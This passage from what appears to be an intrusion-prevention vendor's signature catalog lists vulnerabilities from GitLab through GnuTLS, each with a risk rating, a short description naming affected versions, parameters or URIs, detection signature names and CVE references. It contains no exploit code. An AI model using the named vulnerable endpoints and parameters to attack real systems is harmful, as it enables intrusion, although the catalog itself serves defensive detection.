Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: GitLab
Type: Insecure Configuration
Description: A vulnerability in GitLab, versions 13.0 - 14.8.2, 14.7.4, and 14.6.5, which allows remote attackers to query the GitLab GraphQL API without authentication to acquire the list of GitLab users.
Situation: HTTP_CRL-Gitlab-Graphql-API-User-Enumeration
References:
CVE-2021-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4191
Back to top

Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A resource exhaustion vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper user input validation when handling labels description. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CRL-Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption
References:
CVE-2024-2818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2818
Back to top

Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in the Community edition and Enterprise edition of GitLab. The vulnerability is due to improper input validation of Mermaid Markdown. A remote, authenticated attacker can exploit this vulnerability by sending specially-crafted markdown to the target system. Successful exploitation could result in the execution of script code in the security context of the browser of any user visiting the affected pages.
Situation: HTTP_CRL-Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting
References:
CVE-2021-22242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22242
Back to top

Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: Improper validation of the application name parameter in certain requests causes a cross-site scripting vulnerability in GitLab. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530
References:
CVE-2024-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6530
Back to top

Gitlab-Project-Import-Command-Injection

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A command injection vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to errors in parsing imported project files on the server. A remote authenticated attacker could exploit this vulnerability by sending a crafted project file to the target server. Successful exploitation could lead to arbitrary command execution under the security context of the worker user on the vulnerable server.
Situation: File-Text_Gitlab-Project-Import-Command-Injection
References:
CVE-2022-2185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185
Back to top

Gitlab-Project-Settings-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1489-5242
Last changed: sgpkg-ips-1489-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in the Community Edition and Enterprise Edition of GitLab. The vulnerability is due to improper input validation of the deploy key name. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation could result in the execution of script code in the security context of a target user's browser.
Situation: HTTP_CRL-Gitlab-Project-Settings-Stored-Cross-Site-Scripting
References:
CVE-2022-2230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2230
Back to top

Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835

About this vulnerability: An attempt to exploit a vulnerability in GitLab detected
Risk: High
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A cross-site scripting (XSS) condition exists within GitLab in versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1. By leveraging this condition, an attacker can craft a malicious page to exfiltrate sensitive user information.
Situation: HTTP_CSU-Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835
References:
CVE-2024-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4835
Back to top

Gitlab-Wiki-API-Attachments-Command-Injection

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GitLab Wiki
Type: Input Validation
Description: There has been reported a remote code execution vulnerability in GitLab Wiki API. Exploiting this vulnerability can lead in arbitrary code execution.
Situation: HTTP_CRL-Gitlab-Wiki-API-Attachments-Command-Injection
References:
CVE-2018-18649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18649
Back to top

Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533

About this vulnerability: A vulnerability in GitList
Risk: High
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Gitlist
Type: Input Validation
Description: A vulnerability in Gitlist, version 0.6.0, which allows remote attackers to execute arbitrary code due to the insufficient validation of the php function 'escapeshellarg'.
Situation: HTTP_CRL-Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533
References:
CVE-2018-1000533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000533
Back to top

Gitlist-Unauthenticated-Remote-Command-Execution

About this vulnerability: A Gitlist Unauthenticated Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gitlist
Type: Input Validation
Description: A vulnerability in Gitlist, versions before 0.5.0, which allows remote attackers to execute arbitrary commands with shell metacharacters in the URI of a request for /blame/master/, /master/, or /stats/master/.
Situation: HTTP_CSU-Gitlist-Unauthenticated-Remote-Command-Execution
References:
CVE-2014-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4511
Back to top

GitStack-Remote-Code-Execution-Vulnerability

About this vulnerability: A GitStack Remote Code Execution Vulnerability
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GitStack
Type: Input Validation
Description: A vulnerability in GitStack, version 2.3.10, which allows remote attackers to execute arbitrary code in the username and password fields via the rest/user/ URI.
Situation: HTTP_CRL-GitStack-Remote-Code-Execution-Vulnerability
References:
CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955
Back to top

GitStack-Unauthenticated-Rest-API-Requests

About this vulnerability: A GitStack Unauthenticated REST API Requests Vulnerability
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GitStack
Type: Input Validation
Description: A vulnerability in GitStack, versions 2.3.10 and below, which allows remote attackers to list users and repositories, and add or delete users, via username and password fields to the /rest/user/ URI, due to the lack of user validation/authentication.
Situation: HTTP_CRL-GitStack-Unauthenticated-Rest-API-Requests
References:
CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955
Back to top

GitStack-Unsanitized-Argument-Remote-Code-Execution

About this vulnerability: A vulnerability in GitStack
Risk: High
First detected in: sgpkg-ips-1134-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GitStack
Type: Input Validation
Description: A vulnerability in GitStack, versions through 2.3.10, which allows remote attackers to add a user via the username and password fields in the rest/user/ URI, due to insufficient authentication checks.
Situation: HTTP_CRL-GitStack-Unsanitized-Argument-Remote-Code-Execution
References:
CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955
Back to top

GiveWP-Unauthenticated-Donation-Process-Exploit

About this vulnerability: An attempt to exploit a vulnerability in the GiveWP Donation Plugin detected
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1776-5242
Platform: Windows; Linux; Unix
Software: Wordpress GiveWP Plugin
Type: Input Validation
Description: A vulnerability in the GiveWP Donation Plugin and Fundraising Platform plugin for WordPress, versions 3.14.1 and before, which allows remote attackers to execute arbitrary code with a malicious request, due to insufficient validation of the give_title parameter.
Situation: HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit
HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit-2
References:
CVE-2024-5932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5932
Back to top

GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module

About this vulnerability: An attempt to exploit a vulnerability in a GL.iNet device detected.
Risk: High
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1728-5242
Platform: Unix; Linux
Software: GL.iNet
Type: Input Validation
Description: A vulnerability in multiple GL.iNet devices which allows remote attackers to inject and execute arbitrary shell commands via JSON parameters at the "gl_system_log" and "gl_crash_log" interface in the "logread" module.
Situation: File-Text_GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module
References:
CVE-2023-50445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50445
Back to top

GlassFish-Authenticated-Code-Execution

About this vulnerability: A vulnerability in Oracle GlassFish
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle GlassFish Server
Type: Malfunction
Description: Default credentials used
Situation: Generic_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution
HTTP_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution
References:
CVE-2011-0807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0807
Back to top

Glasstoken-WebShell

About this vulnerability: Glasstoken webshell
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Glasstoken webshell is associated with the known post-compromise activities after the exploitation of CVE-2023-46805 and CVE-2024-21887 in Ivanti Secure Connect VPN.
Situation: File-Text_Glasstoken-WebShell
Back to top

Gld-Greylisting-Server-Remote-System-Compromise

About this vulnerability: Greylisting server remote compromise
Risk: High
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Gld
Type: Malfunction
Description: Gld, a greylisting server for Postfix, suffers from both a buffer overflow and a format strings vulnerability. The buffer overflows are caused by careless use of strcpy and sprintf in the code, and the format strings vulnerability comes from the illegal use of the syslog() function. Both vulnerabilities can be exploited by remote attackers to execute arbitrary code on the server running Gld.
Situation: Generic_Gld-Greylisting-Server-Format-String-Remote-System-Compromise
Generic_Gld-Greylisting-Server-Buffer-Overflow-Remote-System-Compromise
References:
CVE-2005-1100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1100
BID-13129
http://www.securityfocus.com/bid/13129
OSVDB-15493
http://www.osvdb.org/15493
Back to top

Glibc-DNS-Resolver-Buffer-Overflow

About this vulnerability: A vulnerability in glibc
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: glibc
Type: Buffer Overflow
Description: A vulnerability exists in the DNS stub resolver library in ISC BIND that also affects the resolver component of older versions of the glibc library.
Situation: DNS-UDP_Glibc-DNS-Resolver-Buffer-Overflow
References:
CVE-2002-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0029
BID-6186
http://www.securityfocus.com/bid/6186
Back to top

GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in GlobalSCAPE Secure FTP Server
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GlobalSCAPE
Type: Buffer Overflow
Description: A buffer overflow vulnerability in GlobalSCAPE Secure FTP Server prior to 3.0.3 which allows a remote attacker to execute arbitrary code via a long FTP command. A valid user account, or ananymous access, is required.
Situation: FTP_CS-GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow
References:
CVE-2005-1415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1415
BID-13454
http://www.securityfocus.com/bid/13454
OSVDB-16049
http://www.osvdb.org/16049
Back to top

GLPI-Auth.php-SQL-Injection

About this vulnerability: A vulnerability in GLPI-Project GLPI
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: Improper validation of the auth HTTP parameter in the login page of the GLIP application causes an SQL injection vulnerability, which can be exploited to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-GLPI-Auth.php-SQL-Injection
References:
CVE-2022-31061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31061
Back to top

GLPI-Computervirtualmachine-SQL-Injection

About this vulnerability: A vulnerability in GLPI-Project GLPI
Risk: Moderate
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: Improper sanitization of the UUID of a virtual machines causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-GLPI-Computervirtualmachine-SQL-Injection
File-Text_GLPI-Computervirtualmachine-SQL-Injection
File-TextId_GLPI-Computervirtualmachine-SQL-Injection
References:
CVE-2023-36808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36808
Back to top

GLPI-Htmlawedtest-Code-Injection

About this vulnerability: A vulnerability in GLPI
Risk: Moderate
First detected in: sgpkg-ips-1513-5242
Last changed: sgpkg-ips-1513-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: Improper validation of user configuration data sent to the htmLawedTest.php endpoint causes a code injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Project-GLPI-Htmlawedtest-Code-Injection
References:
CVE-2022-35914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35914
Back to top

GLPI-install.php-Remote-Command-Execution

About this vulnerability: GLPI install.php Remote Command Execution attack
Risk: Moderate
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GLPI
Type: PHP Injection
Description: There is an arbitrary code execution vulnerability in GLPI Information Resource-Management software.
Situation: HTTP_CRL-GLPI-install.php-Remote-Command-Execution
References:
CVE-2013-5696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5696
Back to top

GLPI-Inventory-Agent-SQL-Injection

About this vulnerability: A vulnerability in GLPI-Project GLPI
Risk: Moderate
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: Improper validation of user data from inventory agent requests causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: File-Text_GLPI-Inventory-Agent-SQL-Injection
File-TextId_GLPI-Inventory-Agent-SQL-Injection
References:
CVE-2023-35924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35924
Back to top

GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727

About this vulnerability: A SQL injection vulnerability in GLPI
Risk: High
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: An SQL injection vulnerability has been reported in GLPI. The vulnerability is due to improper validation of user data from inventory agent requests used in SQL queries. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in an attacker executing arbitrary SQL queries against the target server's database.
Situation: File-Text_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
File-TextId_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
References:
CVE-2023-46727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46727
Back to top

GLPI-Rest-API-User_Token-SQL-Injection

About this vulnerability: A vulnerability in GLPI-Project GLPI
Risk: Moderate
First detected in: sgpkg-ips-1528-5242
Last changed: sgpkg-ips-1528-5242
Platform: Generic
Software: GLPI
Type: Input Validation
Description: Improper validation of the user token when authenticating with the REST API causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CS-GLPI-Rest-API-User_Token-SQL-Injection
References:
CVE-2022-39323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39323
Back to top

Glutton-Backdoor-Activity

About this vulnerability: Glutton backdoor activity detected
Risk: High
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Linux
Software: Glutton malware
Type: Backdoor
Description: The Chinese Winnti hacking group is using a new PHP backdoor, named 'Glutton', in attacks on organizations in China and the U.S.. The backdoor is also used in attacks on other cybercriminals. Chinese security firm QAX's XLab discovered the malware in April 2024. However, the evidence of its deployment dates back to December 2023.
Situation: Generic_UDP-Glutton-Backdoor-C2-Traffic
HTTP_CSU-Glutton-Backdoor-HTTP-Traffic
Generic_CS-Glutton-Backdoor-C2-Traffic
Back to top

Gmail-Web-Interface-Usage

About this vulnerability: Gmail web interface usage
Risk: Moderate
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Browser
Description: Usage of the Gmail web service was detected.
Situation: HTTP_CRL-Gmail-Web-Interface-Usage
Back to top

Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow

About this vulnerability: A vulnerability in Libxslt Libxslt
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libxslt
Type: Buffer Overflow
Description: There exists a heap based buffer overflow vulnerability in RC4 libxslt library extension.
Situation: HTTP_SS-Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
File-Text_Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
References:
CVE-2008-2935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935
BID-30467
http://www.securityfocus.com/bid/30467
Back to top

Gnu-C-Library-Getaddrinfo-Buffer-Overflow

About this vulnerability: A vulnerability in GNU glibc
Risk: Moderate
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the getaddrinfo() function of the GNU C Library. A remote, unauthenticated attacker can use this to execute remote code or acchieve denial of service conditions.
Situation: DNS-TCP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow
Datalength-UDP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow
References:
CVE-2015-7547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547
Back to top

Gnu-C-Library-Gethostbyname-Buffer-Overflow

About this vulnerability: A vulnerability in GNU C Library
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: glibc; Exim
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in GNU C Library (glibc) __nss_hostname_digits_dots() function which is accessible from gethostbyname*() functions. The function can overflow sizeof(*char) bytes, 4 or 8 for 32-bit or 64-bit architectures, respectively. A remote attacker can exploit this vulnerability by providing crafted input to an application that uses a gethostbyname function with user controlled input; the exact mechanism will depend on the application using the vulnerable function. Successful exploitation could result in code execution in the context of the affected application. This vulnerability is commonly referred to as 'GHOST'.
Situation: SMTP_Gnu-C-Library-Gethostbyname-Buffer-Overflow
SMTP_Helo-Overflow
References:
CVE-2015-0235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235
BID-72325
http://www.securityfocus.com/bid/72325
OSVDB-117579
http://www.osvdb.org/117579
Back to top

Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow

About this vulnerability: A vulnerability in GNU glibc
Risk: High
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: glibc
Type: Buffer Overflow
Description: A code execution vulnerability exists in GNU C Library. The vulnerability is due to an error within the getanswer_r() function when handling DNS response resulting in a buffer overflow. A remote attacker can exploit this vulnerability by providing a specially-crafted DNS response to an application using the getanswer_r() functionality.
Situation: DNS-UDP_Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow
References:
CVE-2015-1781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781
BID-74255
http://www.securityfocus.com/bid/74255
Back to top

Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in The GIMP Team GIMP
Risk: Moderate
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Platform: Generic
Software: GIMP
Type: Buffer Overflow
Description: Improper handling of DDS files causes a buffer overflow vulnerability in GIMP. A successful exploitation can allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow
References:
CVE-2023-44441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44441
Back to top

Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in GIMP
Risk: High
First detected in: sgpkg-ips-1717-5242
Last changed: sgpkg-ips-1717-5242
Platform: Generic
Software: GIMP
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PSD file. Successful exploitation could result in arbitrary code execution under the context of the user.
Situation: File-Binary_Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow
References:
CVE-2023-44442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44442
Back to top

Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow

About this vulnerability: A vulnerability in GIMP
Risk: High
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Platform: Generic
Software: GIMP
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to handle PSP files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious image. Successful exploitation could result in arbitrary code execution under the context of the user.
Situation: File-Binary_Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow
References:
CVE-2023-44444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44444
Back to top

Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification

About this vulnerability: A vulnerability in Free Software Foundation gzip
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: gzip
Type: Malfunction
Description: There exists a vulnerability in the GNU gzip application. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification
References:
CVE-2006-4335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4335
BID-20101
http://www.securityfocus.com/bid/20101
Back to top

Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in GNU Libextractor
Risk: Moderate
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GNU Libextractor
Type: Malfunction
Description: Improper handling of long File Comment fields within ZIP files causes an out of bounds read vulnerability in the Gnu Libextractor library. A successful exploit may cause a denial of service condition or a data leak.
Situation: File-Binary_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
File-Zip_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
References:
CVE-2018-16430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16430
Back to top

Gnu-Radius-SQL-Accounting-Format-String-Vulnerability

About this vulnerability: A vulnerability in Free Software Foundation GNU Radius
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GNU Radius
Type: Format String
Description: There is a format string vulnerability in the GNU Radius suite. The flaw may be exploited by sending a malicious request message to the Radius daemon. Successful exploitation may allow an attacker to inject and execute arbitrary code on the target host within the privileges of the Radius process. If the attack is not successful in code injection and execution, the target Radius server child process will terminate upon exploitation. The main Radius server process is not affected. If an attack results in successful code injection and its subsequent execution, the behaviour of the target host will depend on the intention of the attacker. Note that any code execution will occur within the security context of the affected service, normally root.
Situation: Generic_Gnu-Radius-SQL-Accounting-Format-String-Vulnerability
References:
CVE-2006-4181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4181
BID-21303
http://www.securityfocus.com/bid/21303
Back to top

Gnu-Tar-From_Header-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in GNU Tar.
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Linux
Software: GNU Tar
Type: Malfunction
Description: A vulnerability in GNU Tar, versions 1.34 and prior, which allows remote attackers to cause a denial of service condition or diclose information by enticing a victim to extract a crafted file, due to a missing bounds check when reading a base-256 value in the from_header function.
Situation: File-Binary_Gnu-Tar-From_Header-Out-Of-Bounds-Read
References:
CVE-2022-48303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303
Back to top

Gnu-Wget-Cookie-Injection-Policy-Bypass

About this vulnerability: A vulnerability in GNU wget
Risk: Moderate
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wget
Type: Input Validation
Description: Improper handling of cookies within HTTP responses, causes a vulnerability in Gnu Wget, allowing arbitrary cookies to be set for arbitrary domains, which can lead to a policy bypass.
Situation: HTTP_SHS-Gnu-Wget-Cookie-Injection-Policy-Bypass
References:
CVE-2018-0494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0494
Back to top

Gnu-Wget-FTP-Remote-File-Creation

About this vulnerability: A vulnerability in GNU wget prior to 1.16 wget
Risk: Moderate
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wget
Type: Input Validation
Description: An input validation error exists in wget. The vulnerability can occur when wget retrieves files or directories over FTP that are or that contain symlinks. By default wget creates symlinks locally instead of following symlinks on the destination and creating duplicate files locally. A remote attacker can exploit this vulnerability by creating a crafted FTP directory listing on a server and enticing a user to open the FTP location with a vulnerable wget. Upon successful exploitation, arbitrary files, directories or symlinks with attacker-desired permissions are created on the target system.
Situation: FTP_DI-Gnu-Wget-FTP-Remote-File-Creation
References:
CVE-2014-4877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4877
OSVDB-113736
http://www.osvdb.org/113736
Back to top

Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in GNU Wget
Risk: High
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wget
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in GNU Wget, verions prior to 1.19.2, which allows remote attackers to execute arbitrary code by enticing a user to make an HTTP request with the affected application, due to the improper handling of HTTP responses with chunked transfer-encoding within the skip_short_body() function.
Situation: HTTP_SCH-Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow
References:
CVE-2017-13089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089
Back to top

GnuPG-Message-Packet-Length-Handling-Integer-Overflow

About this vulnerability: A vulnerability in Free Software Foundation GnuPG
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuPG
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in the GnuPG (GNU Privacy Guard) product. The problem is caused by an incorrect handling of the user supplied data. An attacker can exploit this vulnerability to crash a vulnerable application or execute arbitrary code in the security context of the currently running process. In an attack case where code injection is not successful, the affected application will terminate abnormally. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-TextId_GnuPG-Message-Packet-Length-Handling-Integer-Overflow
References:
CVE-2006-3746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3746
BID-19110
http://www.securityfocus.com/bid/19110
OSVDB-27664
http://www.osvdb.org/27664
Back to top

Gnutella-Peer-To-Peer-Network-Usage

About this vulnerability: Gnutella Peer-To-Peer Network usage
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Gnutella
Type: Peer-to-Peer
Description: Gnutella is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: HTTP_CSH-P2P-Phex-Client
P2P-TCP_Gnutella-Connect
P2P-TCP_Gnutella-Response
Back to top

GnuTLS-Certificate-Verification-Policy-Bypass

About this vulnerability: A vulnerability in GnuTLS GnuTLS
Risk: High
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GnuTLS
Type: Malfunction
Description: A policy bypass vulnerability has been found in GnuTLS. The vulnerability is due to an error in validating certificates. A remote attacker can employ this vulnerability to bypass certificate validation performed by an application using a vulnerable version of the GnuTLS library.
Situation: HTTPS_SS-GnuTLS-Certificate-Verification-Policy-Bypass
References:
CVE-2014-0092
